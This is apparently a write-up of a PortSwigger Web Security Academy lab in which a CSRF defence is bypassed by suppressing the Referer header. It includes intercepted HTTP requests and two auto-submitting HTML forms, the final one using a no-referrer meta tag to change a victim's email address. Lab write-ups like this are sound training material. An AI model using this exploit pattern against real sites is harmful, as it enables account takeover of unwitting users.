Skip to content
Field Value
Platform PortSwigger Web Security Academy
Type CSRF — Referer Validation Bypass
Difficulty Practitioner
Target 0adc005604ccc16182cff27000be00df.web-security-academy.net
Objective Change the victim's email address by suppressing the Referer header

CSRF Where Referer Validation Depends on Header Being Present — Writeup

Reconnaissance

Initial Observation

Logged in as wiener:peter. Intercepting the email change request:

POST /my-account/change-email HTTP/2
Host: 0adc005604ccc16182cff27000be00df.web-security-academy.net
Cookie: session=GxumnSzImEUhqRbGR9ZiUc8FkpSzxToy
Referer: https://0adc005604ccc16182cff27000be00df.web-security-academy.net/my-account?
email=teto%40tetomail.com
Screenshot

The Referer header is present on the request — the server is using it to check that the request is coming from its own domain. No CSRF token either, so if the Referer check can be worked around we're in.

Web — Referer Validation Behavior

Building a basic PoC using the update email form and viewing it from the exploit server:

<form class="login-form" name="change-email-form" action="https://0adc005604ccc16182cff27000be00df.web-security-academy.net/my-account/change-email" method="POST">
    <input required="hidden" type="email" name="email" value="[email protected]">
</form>

<script>
    document.forms[0].submit();
</script>

Invalid Referer error:

Screenshot
Screenshot

Makes sense — the request is coming from the exploit server so the Referer header shows:

Referer: https://exploit-0a7a00190406c18582f4f1e501090059.exploit-server.net/

Testing in Burp Repeater — deleting the Referer header entirely:

Screenshot

302 Found → follow redirect → 200 OK → email changed.

Screenshot

The server only checks the Referer when it's present — if the header is missing, validation doesn't run at all and the request goes through. The only thing needed is to suppress it from the PoC.

Attack Path

Exploit — Suppressing the Referer Header

The <meta name="referrer" content="no-referrer"> tag tells the browser not to send a Referer header with any requests originating from the page:

<html>
<head>
    <meta name="referrer" content="no-referrer">
</head>
<form class="login-form" name="change-email-form" action="https://0adc005604ccc16182cff27000be00df.web-security-academy.net/my-account/change-email" method="POST">
    <input required="hidden" type="email" name="email" value="[email protected]">
</form>

<script>
    document.forms[0].submit();
</script>
</html>

Victim visits the exploit server → form auto-submits with no Referer → server skips validation → email changes.

Screenshot

Deliver exploit to victim > lab solved :P

Resources